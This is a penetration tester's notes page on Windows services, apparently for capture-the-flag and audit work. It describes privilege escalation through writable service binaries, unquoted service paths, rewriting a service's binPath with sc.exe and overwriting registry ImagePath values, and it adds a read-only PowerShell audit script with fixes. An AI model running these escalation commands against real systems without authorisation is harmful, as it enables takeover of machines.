Windows services
You can learn more about Windows services here.
- List services
PS> Get-Service
PS> net start
PS> sc.exe query # includes state and type details
- Get more info about a service
PS> sc.exe qc xxx
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: xxx
[...]
BINARY_PATH_NAME : C:\[...]\service.exe
[...]
- To view the permissions of the user on a service
PS> .\PsService.exe security service_name
PS> sc.exe sdshow service_name
PS> accesschk.exe ./xxx.exe -v # permissions on the service binary itself
PS> accesschk.exe /accepteula -quvcw service_name # -c: query the service object, not a file
In CTFs you may be able to start/stop the service manually; in a real environment that usually requires rights such as Server Operator.
PS> sc.exe stop xxx
PS> # do your job
PS> sc.exe start xxx
Notable services: vss, dns, Spooler, wuauserv, AppReadiness, etc.
Pentester Notes
Insecure permissions
The current user may be able to replace the service binary with a malicious executable (ex: revshell.exe).
PS> icacls C:\[...]\service.exe
PS> move C:\[...]\service.exe C:\[...]\service.exe.old
PS> icacls C:\[...]\malicious.exe /grant Everyone:F
Unquoted Service Path
If the service's binary path contains spaces and is not quoted, and the attacker can create files in one of the intermediate directories, then the attacker can drop an executable that Windows runs instead of the real binary, with the rest of the path passed to it as arguments.
PS> icacls $Env:appdata\Vulnerable Program\service.exe
PS> move C:\[...]\malicious.exe $Env:appdata\Vulnerable.exe
PS> # the service will execute
PS> # $Env:appdata\Vulnerable.exe Program\service.exe
You can find such services using:
CMD> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
PS> wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | Where-Object {$_ -notmatch '".*?"' -and $_ -match '\S'}
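A read-only audit version of the checks in the two sections above (writable service binaries and unquoted service paths), added here as an example and not taken from the original notes. It assumes an elevated PowerShell session; the identity list, the `.exe` heuristic and the output fields are choices of this example.

```powershell
# Added audit helper (not part of the original notes). Read-only: lists services whose
# binary path is unquoted and contains spaces, and binaries/folders writable by broad groups.
$BroadIdentities = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                     'NT AUTHORITY\INTERACTIVE')
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'

# Executable portion of a service command line: the quoted part, or everything up to the
# first ".exe" when unquoted (heuristic; other extensions fall back to the first token).
function Get-ServiceBinaryPath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName.Trim()
    if ($p -match '^"([^"]+)"') { return $Matches[1] }
    $idx = $p.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
    if ($idx -ge 0) { return $p.Substring(0, $idx + 4) }
    return $p.Split(' ')[0]
}
# Unquoted path with a space in the executable portion: the SCM tries each prefix that
# ends at a space (C:\Program.exe, C:\Program Files\Vulnerable.exe, ...) before the real one.
function Test-UnquotedServicePath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName) -or $PathName.Trim().StartsWith('"')) { return $false }
    return (Get-ServiceBinaryPath -PathName $PathName).Contains(' ')
}
# Allow ACEs that grant write-class rights to one of the broad identities above.
function Get-BroadWriteAccess {
    param([string]$Path)
    if ([string]::IsNullOrWhiteSpace($Path) -or -not (Test-Path -LiteralPath $Path)) { return @() }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $BroadIdentities -contains $_.IdentityReference.Value -and
        (($_.FileSystemRights -band $WriteMask) -ne 0)
    } | ForEach-Object { "$Path <- $($_.IdentityReference) ($($_.FileSystemRights))" })
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $bin = Get-ServiceBinaryPath -PathName $svc.PathName
    if (-not $bin) { continue }   # no command line recorded for this service
    $writable = @(Get-BroadWriteAccess -Path $bin) + @(Get-BroadWriteAccess -Path (Split-Path -Path $bin -Parent))
    $unquoted = Test-UnquotedServicePath -PathName $svc.PathName
    if ($unquoted -or $writable.Count -gt 0) {
        [pscustomobject]@{ Name = $svc.Name; StartMode = $svc.StartMode; RunAs = $svc.StartName
                           Unquoted = $unquoted; PathName = $svc.PathName; Writable = ($writable -join '; ') }
    }
}
$findings | Format-List
```

Reported services are fixed by quoting the binary path in the service configuration (sc.exe config with a quoted binPath) and by removing write rights for the flagged identities on the binary and its folder.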
Insecure Service Permissions
This occurs when the current user can modify the configuration of the service itself, for example change the location of its binary. Check with the accesschk command: if the user is granted SERVICE_ALL_ACCESS on the service, its configuration can be rewritten at will.
PS> sc.exe config xxx binPath= C:\[...]\malicious.exe
PS> sc.exe config xxx binPath=C:\[...]\malicious.exe obj= LocalSystem
A common approach to execute a command is to use:
PS> sc.exe config XXX binPath= "cmd /c <some command here>"
PS> sc.exe config XXX binPath= "C:\windows\system32\cmd.exe /c <some command here>"
PS> sc.exe start XXX # start fails (cmd.exe is not a real service), but the command has already been executed
Insecure Registry
Windows stores the configuration of each service under hklm\System\CurrentControlSet\services. The ImagePath value references the path to the executable of the service. We may be able to overwrite some of these values:
Detect
PS> .\accesschk.exe /accepteula -kvuqsw hklm\System\CurrentControlSet\services
Exploit
PS> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\XXX -Name "ImagePath" -Value "<some command here>"
PS> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\XXX -Name "ImagePath" -Value "C:/<path_to_executable>"
Well-Known CVEs
- PrintNightmare (CVE-2021-1675) vulnerability in Spooler service.
To-do
Stuff that I found but have not read/used yet.
- It's recommended to use service accounts for services.
- Most services run with LocalSystem privileges by default.
- From the SCM, a program can be configured to run when a service fails (a recovery action). If one is configured, it can be exploited.